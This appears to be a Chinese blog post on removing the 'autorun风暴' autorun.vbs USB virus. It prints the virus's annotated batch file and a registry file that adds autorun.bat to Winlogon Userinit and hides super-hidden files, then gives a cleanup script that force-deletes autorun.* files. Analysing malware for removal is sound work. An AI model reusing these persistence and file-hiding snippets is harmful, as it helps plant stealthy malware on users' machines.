autorun.vbs病毒的清除办法
症状:计算机里面出现一堆autorun为文件名的文件,删除后出现找不到autorun.vbs的提示。我就打开其中的一个文件:Autorun.bat,内容如下:
@echo off //不显示系统提示符
rem autorun风暴 //病毒名称:autorun风暴
if exist ./autorun.reg regedit /s ./autorun.reg //如果存在该目录下的autoun.reg注册表文件写入注册表
if not "%1"=="" goto open //注册表文件导入成功,进入open标记处。
if exist autorun.vbs start WScript.exe autorun.vbs&exit //如果存在autorun.vbs,则使用WScript.exe将VBS文件运行,然后退出。
if exist %SYSTEMROOT%/system32/autorun.vbs start WScript.exe %SYSTEMROOT%/system32/autorun.vbs&exit //如果系统目录下的system32内有autorun.vbs,那么用WScript.exe运行VBS,然后退出。
exit //退出
:open //标记为open
if not "%1"=="Open" goto next //如果open成功,进入next标记
start explorer ./ //开始当前目录
exit // 退出
:next //标记为netx
if not "%1"=="Over" goto :next2 //如果标记不成功,进入next2标记
if exist ./autorun.bin type ./autorun.bin >C:/autorun.txt&&exit //如果当前目录存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
if exist %SYSTEMROOT%/system32/autorun.bin type %SYSTEMROOT%/system32/autorun.bin >c:/autorun.txt&&exit //如果系统目录system32下存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
exit //退出
:next2 //标记为next2
if "%1"=="-" attrib -s -a -h -r %2/autorun.* //先标记所有autorun开头的文件为非系统、非只读、非隐藏、非..文件
if "%1"=="+" attrib +s +a +h +r %2/autorun.* //先标记所有autorun开头的文件为系统、只读、隐藏、..文件
:end //结束
文件二:Autorun.reg
Windows Registry Editor Version 5.00 //Windows 注册表编辑器 5.00创建
autorun风暴 //autorun风暴
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"="userinit.exe,autorun.bat" //在该条目下的userinit上添加一个autorun.bat执行文件。
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]
"ShowSuperHidden"=dword:00000000 //不显示隐藏文件。
我倒,这个病毒还真有点搞笑,连杀毒说明书都写好了,不过,作者显然是个好学生,老师教的要写好注释真的没错啊!
杀毒方法:
可以制作一个批处理文件来进行,内容如下:
@echo on
taskkill /im explorer.exe /f
taskkill /im wscript.exe
start reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/EXplorer/Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
start reg import kill.reg
del c:/autorun.* /f /q /as
del %SYSTEMROOT%/system32/autorun.* /f /q /as
del d:/autorun.* /f /q /as
del e:/autorun.* /f /q /as
del f:/autorun.* /f /q /as
你的盘符多就多写几个
start explorer.exe
执行它就行了。
autorun.vbs病毒的清除办法相关推荐
- autorun病毒手工清除办法
autorun病毒清除办法 首先建立一个.text文本文件,把下面内容复制到里面: @echo on taskkill /im explorer.exe /f taskkill /im wscript ...
- autorun.vbs病毒专杀
不小心下载了一个病毒,这个病毒一般是又U盘传播!感染病毒的现象是:打开硬盘的时候,弹出对话框"系统找不到 'system.exe',...............",打开工具栏,设 ...
- U盘流行病毒autorun的分析及清除方法
U盘流行病毒的形态为autorun名称的隐藏文件,后缀名为inf.exe等十种,通常表现为双击无法打开机器盘符,只能右击再点打开:系统变慢.有的没有感觉到异样,不大影响使用,但硬盘根目录下仍然有各种名 ...
- MSN病毒警告及清除办法
如果你收到你的msn好友发来的消息类似如下: xxx,给你看段经典的小电影! http://www.517ting.com/down/down.asp?id=78564 千万不要打开运行,这是一个病毒 ...
- 删除autorun.inf病毒的批处理 简单三招预防
选择"显示隐藏文件"这一选项后,发现U盘有个文件闪出来一下就马上又消失了,而再打开文件夹选项时,发现仍就是"不显示隐藏文件"这一选项.而且刚发现点击C.D等盘符 ...
- CSDN贴子: rundl132.exe和logo1_.exe病毒如何清除
主 题: rundl132.exe和logo1_.exe病毒如何清除(急,谢谢!顶者有分) 作 者: ronaldo1983 (打光棍的和尚) Blog 等 级: 信 誉 值 ...
- AUTO风暴病毒的清除
解决手段: 1.打开任务管理器(ctrl+alt+del或者任务栏右键点击也可),终止所有ravmone.exe的进程 2.进入c:/windows,删除其中的ravmone.exe 3.进入c:/w ...
- crack.vbs病毒,u盘里的所有文件全部变成快捷方式
如果你确定是vbs病毒的话参看下则处理方案! 第一步:限制wscript.exe进程的运行."开始--运行",输入gpedit.msc,然后依次打开"计算机配置--Win ...
- acad.lsp病毒彻底解决办法
acad.lsp病毒彻底解决办法 手动方法:关闭CAD,在全盘搜索 acad.lsp acadapp.lsp acadiso.lsp ,彻底清除即可. 目前有一种lisp代码具备病毒的特征,有一定危害 ...
最新文章
- 利用FFmpeg生成视频缩略图 2.1.8
- canvas剪辑区域
- 当 .NET 5 遇上OpenTelemetry,会碰撞出怎样的火花?
- 同步函数与同步代码块的区别
- OpenCV阶段总结扩充。
- linux中的进程、环境变量和虚拟地址
- php 算生存曲线,手把手教你解读生存曲线
- 49. NAT 服务器
- drozer的安装与模拟器连接
- android 五大框架,YunOS 6要做手机界Wintel 破功Android五大怪
- 解决word里鼠标滚动速度慢
- SpringBoot-SSMP超详细整合案例
- 【1024程序员节】创作创富-对话议题-直播笔记
- [BZOJ2742/Luogu4598][HEOI2012]Akai的数学作业
- TcaplusDB君 · 行业新闻汇编(12月12号)
- 多线程性能及效率问题
- 度量两个矩阵的相似性
- python课程的中期报告范文_课题中期报告书范本
- mac使用ssh密钥连接云服务器
- Ftp连接显示connection refused问题的解决